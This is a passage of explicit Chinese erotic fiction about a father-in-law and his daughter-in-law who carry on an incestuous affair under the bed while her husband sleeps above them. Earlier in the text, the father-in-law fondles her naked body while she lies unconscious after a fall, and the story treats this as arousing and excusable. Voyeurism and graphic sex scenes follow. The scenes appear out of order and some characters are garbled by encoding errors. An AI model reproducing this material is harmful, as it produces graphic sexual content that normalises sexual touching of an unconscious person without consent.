      就在公媳倆渾然忘我的肉搏正激戰到暢快淋漓的時候,一陣手機鈴聲驟然響起,在這黑暗寧靜的房間里顯得格外刺耳。這鈴聲,也驚醒了正在顛凰倒鳳的公媳倆,讓激情的動作驟然停了下來。

      歐陽雄只冀望,那只是個騷擾電話,會馬上停止的。而陳嬌雪則很糾結,郁悶的想著怎么就沒關手機呢?大煞風景??!

      歐陽雄的肉棒還插在兒媳體內,他在兒媳耳邊摩挲著圓潤的耳垂,悄聲說:

      “怎么辦?要不,你爬出去關掉手機?”

      陳嬌雪搖搖頭,她剛玩得性起,怎么能離開那舒服的大肉棒呢?她摟住公公的脖子,屁股輕輕的扭動起來,用動作來表示她的想法。歐陽雄知道了兒媳的意思,又開始律動起來,可只是挺動了幾下又一動不動了。

      原來是床上發出了響聲,歐陽光明被急促連續的鈴聲給吵醒,他蒙著頭,伸手往床柜胡亂抓了幾下,想拿放在上面的手機,沒想到卻把手機給碰到了地上。

      手機掉在地上后還是在不停地叫著,歐陽光明嘟囔了幾句,醉眼朦朧的下了床,撿起手機與對方交談了幾句才掛上手機。

      當陳嬌雪看到老公起來撿手機的時候,緊張得大氣都不敢喘。因?那手機就在床底的邊上,只要老公撩起床罩,或者只要再往下??朝床罩下邊里瞅一下,那她和公公的奸情就會被曝光,她要用什么臉面去對待老公呢?

      偏偏,公公卻在這時候不老實了起來,他看到兒子就在不遠處,也就一米的距離,但他卻抱著兒媳婦,就在兒子的邊上狠狠地干著他老婆,而兒子還毫無知覺,不知道他心愛的老婆,就在他旁邊被他最親愛的父親蹂躪著、征服著。

      陳嬌雪覺得公公的肉棒突然變得更粗了,動作也起伏得更快,她被公公干得欲仙欲死,蜜穴的嫩肉也越縮越緊,她使勁用手掐著公公背部的肌肉,不知道是想公公更用力地干她,還是想讓公公停止一下,免得被老公察覺。

      但隨著公公肉棒快速抽插而?生的快感如波濤洶涌的來臨時,她再也忍不住了,緊緊地摟住公公,全身直顫,她狠狠地咬在公公寬闊的肩膀上,體內的蜜汁如同山洪暴發,一股一股的沖擊在公公火熱的龜頭上,再順著粗長的肉棒流出體外,把屁股都沾濕了。

      歐陽雄雙手緊緊地抓住兒媳那兩瓣富有彈性的屁股,胯下的肉棒死命地撞擊著兒媳的蜜穴,仿佛要把這好多年沒發泄的欲望,通通的在兒媳身上發泄著、征服著。

      就在兒媳達到高潮噴出蜜液而陰道劇烈收縮時,他再也忍不住了,一股濁精猛地噴發出來,全身顫抖的趴在兒媳身上,不時地還抽搐了幾下。床底下,一對赤裸的公媳,就這樣下體緊緊連著,各自的胸口激烈起伏著,都在慢慢著回味著剛才的激情與快感。

      歐陽光明關掉手機,看到老婆不在床上,有些疑惑的說道:“老婆去哪了?去上廁所了嗎?”他也沒多想,以前老婆也有半夜去上廁所的習慣。他太困了,倒在枕頭上,不一會兒又睡了過去。

      可憐的他不知道,她老婆不是去上廁所,而是就在他的睡床下面,跟他父親在享受那男女之歡呢!跟他的父親一起攀上那性愛的巔峰……

      歐陽雄雖然在看電視,但他的心已經飛到了浴室里的那個可人兒去了。那粉嫩的肌膚、火爆性感的身材,再加上那絕美的臉龐,如果……全脫掉那會怎么樣的呢?歐陽雄意淫著。對于他來說,男人就要懂得欣賞美麗的女人,這與親情倫理無關,愛美之心人皆有之。

      當然,歐陽雄也多多少少的被日本的AV影響了,而他最喜歡看的,恰恰是公媳亂倫的片子。因?他覺得,公公那個年紀,還能享受那青春的肉體、緊窄的嫩穴,而且還是兒子的老婆,禁忌的快感讓他總是樂在其中。

      而在老家,偶爾總會聽到哪家公公和兒媳有一腿的風流事,都是兒子出去打工長期不在家,而兒媳因?寂寞再加上生理需要,被公公誘惑下就半推半就的倒在公公胯下了。歐陽雄有時也會幻想著,那公公就是他,而兒媳就是陳嬌雪。

      歐陽雄看著兒媳好久都沒出來,心里想著,女人就是愛干凈,洗個澡也要那么久。突然歐陽雄眼前一亮,他想到了一個主意:假如我假裝肚子不舒服要上廁所,然后去催小雪出來,而小雪在慌忙的情況下有可能就忘了把衣服拿出來,那么,我的機會就來了。歐陽雄想到這,連忙來到浴室門前,想著要怎樣才能裝得像一點。

      就在這時候,浴室里傳來一陣“乒乓”響聲,歐陽雄愣了一下才敲了敲門,試探著問道:“小雪,發生了什么事啦?”只見里面無人回答,歐陽雄拍打著室門,著急的喊著:“小雪,怎么了?怎么不開門?”歐陽雄覺得事不尋常,但他又一時不知道鑰匙在哪,就只好踹門了。好在門也不是鐵門,所以踢了兩三下就把門踢開了,歐陽雄沖了進去,眼前的景像讓他的陽具馬上敬禮了起來。

      只見水灑還在噴著水,但地板上卻橫臥著一具性感妖嬈的肉體,但歐陽雄也無暇去慢慢欣賞,他把水灑關掉,拿來一條干浴巾,把兒媳給包裹起來,再攔腰把她給抱了出來。輕輕的把兒媳放在沙發上,才拿著干毛巾細細的把兒媳身上的水擦干。

      他不允許有水珠還留在兒媳的身上,所以歐陽雄擦得很認真,也很仔細,他從雪白的脖子下慢慢地來到那雪白挺拔的乳峰,慢慢地擦拭著,只是,那毛巾變成了他的大手,兒媳的乳房在他右手中變化著各種形狀。歐陽雄不敢太用力,而左手則順著絲綢般的肌膚來回游走,從沒有一絲贅肉的小腹,到修長的大腿,還有那圓潤的屁股,都讓歐陽雄激動不已。

      他內心也在天人交戰著:上?還是不上呢?這么好的機會,過了這個村就沒那個店了。又看看胯下那個支起的帳篷,仿佛是等待出鞘的寶劍,只等主人一聲令下,就隨著主人在這個可人兒身上沖鋒陷陣,殺得她丟盔棄甲。

      但歐陽雄還是嘆了口氣,把滿腔的欲火壓下。小雪終究是自己的兒媳婦,兒子的老婆,現在還昏迷著,趁人之危行禽獸之事不是他的作風,而且人昏迷著做起來也像充氣娃娃一樣,雖然兒媳長得有些像充氣娃娃。

      上了她呢是禽獸,但不上更禽獸不如吧!歐陽雄自嘲的想著。哎,能過過手癮也不錯。

      歐陽雄打電話給醫院后,找來一件睡衣給兒媳穿了起來,才對著陳嬌雪的人中用力地掐了幾下,并輕聲喊道:“小雪,小雪,醒醒!”隔了一會兒,陳嬌雪才悠悠醒來,她捂著脖子,對公公暈乎乎的說:“爸,我是怎么了?嗯,好痛!”

      歐陽雄關心的說:“你剛才倒在浴室里,是我抱你出來的,我已經打電話叫救護車了?!?br>
      陳嬌雪這時才清醒起來,想到浴室那一幕,臉一下子紅了。她爬起來,卻看到自己穿著睡衣,她結結巴巴的說:“爸,嗯,這睡衣……嗯,這個……”歐陽雄面不改色的說:“嗯,是我幫你穿的?!标悑裳┠樢幌伦蛹t到了脖子下,心想,多羞人??!老公才出差幾天,你就這么想男人了?還想到公公去?結果還是被公公抱出來的,還讓他給自己穿衣服,多難?情??!想到自己被公公赤身裸體的抱著,身子不禁滾燙起來。隨后又想,嗯,公公他不知道有沒有吃我豆腐呀?哎,看都看光了,還在乎揩沒揩油。只是不知道,公公他有沒有趁機對我做那種事???他應該不敢吧,我可是他兒媳??!

      下體也沒有感覺到什么異物進去過。陳嬌雪松了口氣。

      歐陽雄看到兒媳臉一會兒白、一會兒紅的,有些擔心的問道:“小雪,你沒事吧?”陳嬌雪回過神來,有些羞澀的說:“沒。爸,謝謝你?!睔W陽雄故作爽快的笑著說:“傻孩子,你說什么話呢,這是爸該做的。光明不在,不是你照顧爸就是爸照看你??!一家人可不能說兩家話??!”陳嬌雪乖巧的點點頭。


      當歐陽光明回來的時候,陳嬌雪已經好得差不多了,那天晚上,一家人樂呵呵的吃了一頓飯,期間還喝了點紅酒。

      今天陳嬌雪打扮得特別漂亮,一件露出潔白肩膀的T恤,領口很低,那黑色文胸包裹著豐滿嫩白的乳溝清晰可見,黑與白,更襯托出陳嬌雪那白嫩的肌膚。

      下面則是穿著一件緊身的小短裙,更吸引人的是還穿了一件黑色網狀絲襪,那黑與白的搭配,給歐陽雄父子視覺上的震撼。

      那走路搖曳生姿的迷人身材,還有那偶爾俯下身而乍現的春光,都讓他們起了男人最基本的生理反應,尤其是歐陽光明,眼里都是赤裸裸的欲望。歐陽雄也有,只是他不能表現出來,畢竟,坐在他面前的可是他的兒子和兒媳。陳嬌雪喝了點紅酒,不勝酒力的她已是滿臉酡紅,更顯得美艷不可方物。

      飯后,陳嬌雪收拾碗筷到廚房洗刷去了,歐陽雄就到客廳看電視去了。而歐陽光明說要幫陳嬌雪,也溜進了廚房。陳嬌雪正在洗碗,歐陽光明從背后環住陳嬌雪的腰,頭埋在她的肩上深深的吸了口氣,柔情的說:“老婆,我好想你??!你有沒有想我???”

      陳嬌雪被歐陽光明呼出的熱氣弄得脖子癢癢的,不禁“咯咯咯”的笑著說:

      “老公,我也好想你??!哎,你別這樣啊,我還在洗碗呢!”原來,歐陽光明的手已經探進了衣襟里,揉捏著那高聳的乳峰。陳嬌雪急忙按住那不規矩的手,回過頭來嬌嗔的說。

      歐陽光明輕啄了妻子的臉頰,有些興奮的說:“老婆,要不我們來點刺激的吧!”說著挺了挺下身。

      陳嬌雪這才發現自己臀部頂著一根硬硬的棍子,一挺一挺的。陳嬌雪知道那是什么東西,她有些花容失色,緊張的看了客廳方向一眼,低聲說:“你瘋啦,你爸還在外面呢,等下他進來怎么辦?”

      歐陽光明想想也覺得不適合,只好悻悻的打消那個邪惡的念頭,不過,那大手已經從摸胸轉移到那圓潤嫩滑的屁股上,陳嬌雪好無奈,她轉過身來環住老公的脖子親了一下,說:“老公,我要洗碗,你這樣我不好干活啊,你就再忍忍,先去洗個澡,我忙完了就去找你?!闭f完,調皮的眨了眨眼睛,意思你懂的。

      歐陽光明干笑了下,才戀戀不舍的從裙下抽出手來,他輕嗅了手上的余香,意猶未盡的說:“那好吧,老婆,你忙快點,我在房間等你哦!”陳嬌雪把歐陽光明推出了廚房,笑著說:“知道啦!洗澡去吧,身上臭死了?!?br>
      夏天的夜晚也是炎熱的,歐陽雄電視也沒有心情看了。兒媳忙好家務活后,跟他打了聲招呼就溜進房間去了,讓歐陽雄很不習慣,兒子沒回來前都是兒媳陪著他看電視的,跟美女兒媳一起評時事、說八卦、聊聊偶像劇,是多么令人愉快的事,尤其是兒媳偶爾穿著很清涼。

      那短短的睡裙而露出的雪白大腿,細吊帶襯衣下那深深的雪白的乳溝,那半透明的衣衫下,隱隱約約看看到那性感的文胸,甚至,那可愛的小內褲都能看得到些許痕跡。這些撩人的穿著,讓怕熱的歐陽雄感覺像吃了冰淇淋一樣涼爽。

      而陳嬌雪因?以前在家都是這樣穿著,有時候天氣太熱,還只是穿著三點式在家里晃。公公來了后,自然不敢那樣穿,怕被公公罵,但這幾天了解下來,陳嬌雪才發現公公是個很好相處的人,思想也不古板,有時候還跟她討論那些T臺走秀的名模的身材三圍。要知道,陳嬌雪本人可是個業余模特呢!所以后來也自然了起來,對于她來說,女人的魅力就是用來展現的。

      公公有時候偷瞄的眼光都讓陳嬌雪對自己的身材暗自得意,用她的話來說,就是老少通殺。歐陽雄自然清楚這小倆口干什么去了,年輕人嘛,小別勝新婚。

      只是他還是有些淡淡的嫉妒兒子的艷福,想想他年輕時都是父母之命,而老婆也是平凡之極。想想兒子等下的風流快活,再想想自己現在的處境,無奈地嘆了口氣,無精打采的回房間睡覺去了,年紀來了,不能像年輕人那樣熬夜了,早睡對身體很重要。

      在剛想進入房間時,眼光一掃過兒子的臥室,卻意外地發現門居然是半開著的。歐陽雄尋思著:“難道兒子兒媳他們辦那種事都是不關門的?”他腦子里想起了日本毛片中那公公偷看兒子兒媳做愛的場景,不禁有些心篤意亂。

      “難道我也有那個眼福?”歐陽雄輕輕的走過去,小心翼翼的往里面探了探頭:“嗯,怎么沒人?”兒子兒媳那青春揚逸的肉搏戰并沒有看到,讓他非常失望。

      這時,不遠處的浴室傳來說話聲,歐陽雄恍然大悟,原來他們正在洗鴛鴦浴??!歐陽雄走進去,來到了那張鋪著白色床罩的大床前,大床的上面是兒子兒媳的結婚照,照片上兒子英俊瀟灑,臉上掛著自信的微笑;旁邊的兒媳穿著一身潔白的婚紗,小鳥依人的靠在兒子肩上,一臉的幸福。

      床上,凌亂的扔著幾件衣服。歐陽雄拿起一件輕如無物的黑色絲襪,放在鼻尖嗅了嗅,一股清香直滲心扉。歐陽雄有時候都覺得奇怪,那巴掌大的小內褲,還有手上這么點的褲襪,兒媳是怎么穿上去。兒媳的屁股他摸過,并不小??!難道女人真的是水做的,那么的柔弱無骨嗎?

      這時候,走廊傳來一陣腳步聲,打斷了歐陽雄的臆想。他想出去,又覺得不妥,等下怎么跟他們解釋他來這里干什么?找他們聊天?別開玩笑了。

      腳步越來越近,歐陽雄也慌了神,四周看了一下,都沒有什么可以藏人的地方。他眼光突然看到大床,鬼使神差的居然撩起垂下的床罩,鉆進了大床底下,這才舒了口氣。而兒子他們也在歐陽雄剛鉆進床底后才踏入了臥室,不過相差幾秒鐘而已。

      歐陽光明拉著老婆的手,有說有笑的走進了房間。陳嬌雪只是圍著大浴巾,她坐在床上,用一條干毛巾仔細地擦著頭上的濕發。歐陽光明拿出了一個衣袋,有些神秘的對著老婆說:“老婆,你看,我給你買了什么東西?!标悑裳┬χ话褤屵^袋子,說:“是什么東西?我看看?!标悑裳┌汛永锏臇|西一股腦的倒在床上,藍色的空姐制服裝、白色的護士裝,還有紅色的兔子裝等等,看得陳嬌雪目瞪口呆。

      她看了好一會兒才張牙舞爪的朝歐陽光明撲過去:“你這個大色狼,就知道買這些東西嗎?”歐陽光明訕訕的笑了笑,摟住撲過來的老婆,有些哀求的說:

      “我的好老婆,你就穿給老公我看看行不行???看看我老婆穿上去是不是更性感漂亮了。我好想看啊,你就行行好吧!”

      陳嬌雪看著在那里裝小可憐的老公,不禁“噗哧”一笑,食指點了點歐陽光明的額頭,說:“你呀你,不知道怎么說你了。好吧,如你所愿,不過,你得閉上眼睛,等我穿好了你才能睜開眼睛,要不我就不穿了?!睔W陽光明舉起手,投降道:“好好好,我不看,你換吧!”說完面向大墻,閉上眼睛,陳嬌雪這才抖抖嗖嗖的換起了衣服。

      床下的歐陽雄聽到兒子和兒媳的對話,也不禁心癢癢起來,他小心翼翼的觀察周圍黑暗的環境,看能不能看到外面的光明。他把床罩微微的挑了一點,那對面衣柜的落地鏡讓他喜出忘外,因?這個鏡子剛好可以反射到房間的大部份的景像,心想:“兒子,你想獨樂樂???沒門,大家?樂樂吧!”陳嬌雪挑了套藍色的空姐制服,穿好后對自己左看看右看看,才滿意的說:

      “好了,你可以轉過來看啦!”

      歐陽光明聽了這句話,急不可待的轉過身來,眼前的美景讓他不禁呼吸急促起來,兩眼都成紅桃心了。只見陳嬌雪亭亭立立的站著,一頂藍色的帽子把那一頭青絲包裹在里面,身上穿著一件緊身藍色襯衫,把豐滿的雙乳束縛的更突出;胸襟處微微敞開著,一小半的雪白半圓弧線的乳溝若隱若現,潔白的玉脖上,打著一條藍色絲巾。

      而襯衫的下擺,被陳嬌雪刻意的打起個結,所以露出了那如雪的肌膚下的小巧玲瓏的肚臍眼。下身則是穿著一條超短藍色緊身迷你裙,而下面就是被黑色絲襪的包裹的修長玉腿,顯得那樣的高挑性感;而在屁股后面,居然別出心裁的開了個桃心小洞,剛好被上那彎曲的屁股溝的弧線,像一個粉嫩多汁的水蜜桃,讓人忍不住想咬一口。

      畢竟這不是真正的空姐制服,在設計方面都是突出女人的性感與誘惑,而陳嬌雪無疑就是那個最優秀的扮演者,把女人的嫵媚與性感而又不失端莊的儀態,演示得淋漓盡至。

      歐陽光明不知道原來穿著空姐制服是多么的誘惑,而歐陽雄也通過鏡子看得清清楚楚,胯下的陰莖翹得高高,忍不住悄悄用手握住自己的昂揚之物,緩緩地擼動著。而歐陽光明更是不堪,眼中充滿濃濃的欲火,只想把陳嬌雪焚燒殆盡。

      陳嬌雪兩條修長大腿交叉在一起,把帽子摘下掛在右手食指上,輕輕的轉動著,巧笑嫣然的說:“怎么樣,好看嗎?老公?!睔W陽光明吞了吞口水,說:“好看,太好看了,簡直就是?老婆你量身定做的??!好性感??!如果你真的去做空姐,那飛機都飛不起來了。呵呵!”陳嬌雪緩緩地踩著貓步,把帽子甩到一邊,來到歐陽光明面前,左手搭在歐陽光明的肩膀上,右手食指則是輕輕在其胸膛上劃著一個又一個的圓圈,充滿誘惑的聲音說:“真的那么好看嗎?那你有沒有什么獎勵沒有?嗯?”歐陽看著挑逗自己的老婆,再也忍不住心內燃燒的欲望,他猛地攔腰抱起陳嬌雪,向大床走去。陳嬌雪被老公這么一抱,“啊”的驚呼一聲,雙手急忙摟住老公的脖子。

      歐陽光明把老婆拋在床上,而陳嬌雪因?橫臥著,那緊身的迷你裙又向上縮了縮,連白色的小內褲都露出了一些,看得歐陽光明更是興奮不已,他像狼一樣的發出一聲低吼,猛地撲上老婆那性感誘人的嬌軀。

      歐陽雄很郁悶了,他在床底下,上面兒子兒媳婦就要開始肉搏戰了,對他來說,是一種煎熬。而他從鏡子看到床上的角度,也只是兒子那毛絨絨的大腿和兒媳白嫩的大腿,正點部位就看不到了,因?兒媳是被兒子壓著的。

      上面傳來“巴嘰、巴嘰”的聲音,還有兒媳那淡淡的呻吟,歐陽雄憑聲音就判斷出,兒子肯定是在吃兒媳婦那對豪乳。兒媳那對玉乳他也摸過,真是太極品了,渾圓飽滿,摸起來柔軟而富有彈性,那紅棗般的乳頭,都讓他垂涎欲滴。只是可惜,在上面翻云覆雨的不是他,而是他的兒子。

      “如果現在上面的男人換成是我,那該多性福啊,我要讓她嘗嘗我這把老槍的厲害?!睔W陽雄在意淫著。

      “噗”,一件藍色襯衣掉了下來,接著,又一條裙子被扔了下去,然后,文胸、內褲,接二連三的散落在床下。而床上的陳嬌雪已然不絲寸縷,被歐陽光明剝成了小白羊,那沈魚落雁的容?,高挺的雪乳上,兩顆紅棗在空氣中慢慢硬挺起來,右腿微微弓起,而一只邪惡的大手正在大腿內來回摩挲著,偶爾還劃過那粉嫩的私處,引得陳嬌雪微微顫抖,圓潤的屁股不禁往上挺了挺,好像在渴望著什么。

      而陳嬌雪已經是媚眼如絲、滿臉潮紅,那潔白如玉的身子已經慢慢地成?粉色,這是她動情的表現。她微微嬌喘著,抱著埋在她雙乳間吸吮的老公的頭,有些迷亂的說:“嗯……老公,別……別吸了,來干我吧,小妹妹好癢了……快來吧,我受不了了……”

      也怪不得陳嬌雪會如此反應,身懷名器白虎的她,性欲是別人的好多倍,也特別的敏感。而且歐陽光明出差了十幾天,她的性欲得不到滿足,只好壓抑著,而歐陽光明回來后,欲望便如潮水一樣一發不可收拾。

      床下的歐陽雄忍受著上面的顛簸,他也很興奮。他的手上,赫然握著一條白色的小內褲,就是那條很悲催的小內褲,它剛好就掉在床底邊上,被歐陽雄看到了,一只手指頭慢慢地伸出去,勾住內褲的一個角,慢慢地,慢慢地,拖進了床底里面。

      當然,床上的那兩位可是毫無察覺的,在這關頭,誰會去關心掉在地上的小內褲呢?歐陽雄捧著這個意外之喜,把鼻子埋在里面,深深的呼吸著那醉人的香味??赡苁莾合毕春迷鑴倱Q的內褲,所以上面沒有尿味,但卻有一股淡淡的香。

      歐陽雄知道那是女人香,有的女人天生就有著香味,雖然也有不同的,但絕不是香水的味道。這種味道就像催情劑,讓人激情膨湃。歐陽雄把小內褲按在他勃起的陽具上,激動的擼動著。兒媳的肉吃不到,我喝點殘湯總可以吧?

      床上的夫妻倆卻發生了意外,歐陽光明把老婆的玉腿架在肩上,發亮硬挺的陰莖對準了粉嫩的陰唇,那私處已經泛濫成災。他握住陰莖用龜頭摩擦了幾下那水嫩的陰唇,沾了沾上面的淫水,腰一挺,“噗嗤”一聲插了進去。

      陳嬌雪感覺到一根火熱的棍子插入了自己那空虛寂寞多時的小穴,那粗漲的陽具把她的陰道充實得滿滿的,讓她“啊”的一聲,雙手緊抓著床單,舒服的叫了起來。

      但是就這一下,體內那棍子突然漲得更大,歐陽光明滿臉通紅,渾身顫抖幾下,快速的抽插幾下就趴在老婆身上一動不動了。一會兒他才懊惱的說:“唉,還是不行啊,就插這么一下,這么快就射了,身體還是沒完全調理好??!老婆,對不起?!?br>
      床下的歐陽雄愣了愣,兒子有早泄這個毛???原來,歐陽光明在結婚后一時太放縱性生活,雖然后來調養了身子,但還是傷了點元氣,得了早泄這個毛病。

      這次他出國除了出差之外,順便也去找國外的醫生求醫問藥。

      畢竟家里有個如花似玉的老婆而自己卻不能大展雄風,是多么的令人沮喪。

      陳嬌雪雖然滿身欲望得不到滿足,但她還是強忍欲望,雖然她很想把這個銀槍蠟燭頭的男人踢下床去,性欲起來了卻得不到滿足的女人同樣是可怕的,尤其是身懷名器的她。

      但她看到老公那懊惱慚愧的樣子,心又一軟,只好幽幽一嘆,言不由衷的反抱著老公,安慰著說:“老公,你剛才那一槍好厲害,我好舒服的。沒事,你會好起來的,我還等著你來征服我呢!”

      歐陽光明看著善解人意的老婆,感動的摟著說:“老婆,你真好,我愛你。我會好好愛你一輩子?!?br>
      陳嬌雪把頭埋在老公胸前,悶悶的說:“老公,我也愛你?!毙睦飬s是嘆了嘆氣:“什么時候我才能享受那完美的性愛???我真的真的好想要??!”歐陽光明探手往床柜里取出一盒膠囊,倒了一杯水仰頭喝下,有些自慚的對陳嬌雪說:“這是我從國外帶回來的,聽說很有療效,就買來試試??上?,西藥的副作用很大,吃了就很困,很想睡覺?!?br>
      陳嬌雪關心的說:“副作用大那就別吃吧!我們還是看中醫好,雖然不能立竿見影,但也很有效果的?!?br>
      歐陽光明把玩著老婆胸前的玉兔,笑著說:“但你老公等不及了??!放著你這個大美人卻不能享用,是多么痛苦的一件事??!”歐陽光明打了個哈欠,有些睡意的說:“看,這藥效就是來得快,我有點想睡覺了?!标悑裳┯H了老公一下,柔聲說道:“那睡吧,一切都會好的。我可不喜歡裸睡,我下去穿件內褲吧!”

      床底下的歐陽雄聽到一下子慌了神,手里拿著兒媳的內褲,還藏在他們的床底下,這等下要怎么解釋?怎么解釋都沒用的。怎么辦?怎么辦……歐陽雄急得像熱鍋上的螞蟻團團轉。

      陳嬌雪滿懷心事的下了床,心里想著:“唉!等一下又得自己用手解決了。

      我不要這樣,我要熱呼呼的大肉棒,大肉棒??!”陳嬌雪饑渴的想著。

      她往床下一掃,嗯,內褲怎么不見了?她左右看了一下,沒有看到,難道在床底下?她也沒多想,就跪著膝,撩起了床罩。歐陽雄看到一雙潔白的雙足踩在地板上,那玉足是多么的精致,讓人想捧在懷里細細把玩。

      接著,床罩被撩了起來,那還泛紅的絕色容?,還有那因?趴著而下垂的玉乳,隨著兒媳的動作而輕微晃動著。美人美景,但歐陽雄已無心觀賞,他只是尷尬的把手中的內褲遞給兒媳,一邊拼命的向兒媳搖手,暗示她不要讓兒子發覺。

      陳嬌雪撩起床罩,卻沒想到里面還有個人,一時嚇了一跳,驚呼起來。定神一看,原來是公公,他滿臉通紅,一臉尷尬的拿著自己的內褲,在那里拼命的搖著手。

      床上的歐陽光明扭頭過來問:“老婆,怎么啦?”陳嬌雪心思急轉一下,她一把扯過小內褲,放下床罩,假裝撫摸著額頭說:“剛才沒注意,拿內褲的時候不小心碰到頭了。沒事啦,你快睡吧!”說完爬上了床,和歐陽光明并排睡在一起。

      她被公公驚嚇而急速跳動的心才稍微平靜下來,想著:“公公他怎么會在房間里?還躲在床底下!難道他一直都心懷不軌,專門來偷看我和老公做愛?啊,好羞人,剛才都被公公給看光了啊,還有剛才和老公做的事都被他知道了。剛才我應該喊人的,但我?什么沒喊呢?他是我的公公,老公的父親,家和萬事興!如果被老公知道了,以后大家都會尷尬的,甚至還有更不愉快的事情發生,我可不想看到老公和公公反目?!?br>
      其實,陳嬌雪看到公公在床底向她搖手那狼狽的樣子,讓她下意識的圓起了謊。也可能是公公平時對她很關心愛護,所以她不想看到家不和的那一幕,又或者,還有什么別的原因,總之,歐陽雄這一關算是僥幸的過去了。

      歐陽光明“啪”的一下把房里的燈滅了,對著老婆說:“睡吧,晚安?!标悑裳班拧绷艘宦?,想著公公還躲在床底下,心里總覺得很異樣,有些冷卻的身子又有些滾燙著。歐陽雄看著黑暗的周圍,他暗自舒了一口氣,對兒媳更是暗暗感激。他在等兒子熟睡了才敢偷偷的溜出去。

      陳嬌雪卻怎么也睡不著,公公還躲在下面了,“啊,剛才他手上拿著我的內褲,不會是用它來做那種事吧?”她想到自己身上穿的小內褲有可能被公公自慰過,身子更加滾燙了:“公公,他應該很喜歡喜歡我的吧?他的那個東西應該很大吧?不知道還能用不?”

      陳嬌雪一想到肉棒,不禁嚶嚀一聲,私處不禁又流出了些濕濕的液體出來,手忍不住探進內褲里,慢慢撫摸著陰唇。慢慢地,內褲里的玉手動作越來越大,陳嬌雪干脆?起屁股,把剛穿上的內褲脫下來,全身一絲不縷,側身弓著身子,咬著那紅艷的嘴唇,一下一下的探進了身體。想著公公在下面,而自己就在上面自慰,異樣的刺激讓她的情欲一下如山洪爆發了。

      手,還是取代不了那又熱又硬的大肉棒??!陳嬌雪媚眼如絲,發情的女人其實和發情的男人都一個樣,都要發泄,當欲望沖昏了頭腦時,什么事都有可能發生,無疑,陳嬌雪就是這么個女人,她已經被欲望戰勝了理智。她看著漸漸打起呼嚕的老??公,心中閃過一個大膽瘋狂的想法,她往床柜里掏出了一個安全套,悄悄的滑下床,鉆進了床底下。

      歐陽雄正琢磨著怎樣出去,突然,黑暗中一具火熱的嬌軀溜了進來,摟住了歐陽雄的身子。一股吐氣如蘭的氣息,在歐陽雄耳邊輕聲說:“爸,愛我?!睔W陽雄不敢相信自己的眼睛,他感覺好像在做夢,懷里的兒媳正躺在自己的胸前,而兒媳的那句“愛我”,這一刻,他覺得好幸福。他緊緊地摟住兒媳的嬌軀,雖然在伸手不見五指的黑暗中,但歐陽雄還是準確的吻住那柔軟的紅唇,和那條丁香小舌纏綿著,吸吮那甜蜜的芳香。大手則是在那挺翹充滿彈性的屁股上來回撫摸,感受著那圓潤的弧度,另一只大手則攀上兒媳高聳的玉峰,揉捏著那凸起的乳頭。

      他緊緊地摟住這性感誘人的尤物,仿佛想把這柔弱無骨的嬌軀揉進體內。他的嘴慢慢地往下吻,從脖子一直來到那乳峰上,舔著、輕咬著……那淡淡的奶香味讓歐陽雄覺得,這是媽媽媽的味道。大手從臀部來到了大腿內側,當覆蓋上那女人最私密的地方時,赫然發現已經濕漉漉了。

      歐陽雄笑很邪惡,他滑到兒媳下面,把兒媳的雙腿向外張開,頭一埋,扎到兒媳的私處,伸出舌頭在那粉嫩無毛的陰唇上輕輕的舔著,女人發情流出來的液體都有一股騷味,只是兒媳卻沒有那么濃,只是淡淡的,讓人不覺得惡心。他干脆把嘴堵住了整個陰唇,吸琢里面的瓊漿玉液,對于好多年沒舔過陰的歐陽雄來說,的確是這樣。

      陳嬌雪被公公這么一吸,雙腿不禁往里一夾,把公公的頭夾在里面,雙手則插入公公那濃密的頭發中,無意識的摸著。嘴唇輕咬著,不讓自己的呻吟聲發出來,只是屁股微微的一次又一次的往上?,配合著公公的魔舌,讓他的舌頭更深入一點。

      歐陽雄很賣力,他細細的在那勃起的陰蒂上舔著,偶爾,像蛇的舌頭一樣呼的一下探進陰道里,探索那幽深的蜜境,每當這個時候,兒媳就會繃緊全身,雙手緊緊地扯住他的頭發。

      歐陽雄很得意,兒媳的G點被他給發掘出來了,因?這動作才運作了幾下,舌頭就被那柔軟的嫩肉緊張收縮的包裹著。接著,一小股液體噴了出來,他張開嘴,把它全部喝了下去,“聽說女人的陰液能壯陽,不知道是不是真的?”歐陽雄想著。

      歐陽雄已經忍受不了了,他想提槍上馬,但還是有些忌諱:“她可是自己的兒媳婦,兒子的老婆,未來孫子的媽媽,這樣上了會不會遭雷劈?如果不小心有了,那她以后生下來的孩子是叫我爸爸還是叫爺爺?對兒子叫爸爸還是哥哥?”這關系可真夠亂的??!

      但這種禁忌的誘惑,卻讓他更加興奮,他壓在兒媳身上,胯下巨挺頂在兒媳的小腹上,在兒媳耳邊欲擒故縱的輕聲說道:“小雪,要不我們適可而止吧,我們這樣下去可是亂倫??!”

      陳嬌雪已經是意亂情迷,這種禁忌的刺激已經把她的理智淹沒,剩下的,只是動物的本能,那就是交配。她怎能忍受那一而再、再而三半途而廢的高潮?她迫切的想體驗那種飛仙般的快樂。

      她往下握住那頂在自己小腹上的兇器,才發現公公的兇器是那么的粗大,那么的堅硬,而且還比老公的長,一想到等下要被這根巨物貫穿體內,填滿她空虛的蜜穴,身上興奮的顫抖著。歐陽雄昂揚的陽具被兒媳的小手這么一握,全身如電流通過,舒服的喘了口氣。

      陳嬌雪費力地摸出放在旁邊的安全套,有些顫抖的對壓在她身上的公公的耳邊輕聲的說:“爸,我要,我要你的大雞巴干我。來干我吧,小雪我受不了了,你兒子不行,你就滿足我的欲望吧!”

      歐陽雄淫笑的挑逗著:“但我們是公媳啊,這樣做是亂倫???你不怕下地獄嗎?”

      陳嬌雪喃喃地說:“下地獄?下地獄就下地獄吧!不管那么多了。在這黑暗里,我們誰也看不見誰,你不把我當兒媳,我不把你當公公,不就行了嗎?”陳嬌雪有些自欺欺人。

      她把安全套摸索著套在公公的陰莖上,欲火焚身的說:“爸,來吧,戴套就不算亂倫了,至少有個塑料膜隔著?!?br>
      歐陽雄把安全套戴好,兒媳的“戴套不算亂倫”這句話,徹底地把他所有的顧忌和道德倫理拋出九霄云外。他依稀記得,有段新聞說的是一個女老師被一個官員強奸了,報案后那個派出所所長居然說戴套不算強奸的牛語而輿論大嘩。兒媳把這段話套用在亂倫上,真是神來之筆,讓公媳之間的淫亂找到了彼此接受的共同點。

      歐陽雄喘了口氣,緩解一下興奮的神經。他知道,太興奮的話,等一下會快速繳槍棄械的,這是他這幾十年來的性經驗。而且難得在這個美艷性感的兒媳婦身上馳騁,他當然得好好表現一下他的男性雄風,以后,日子還長著呢!

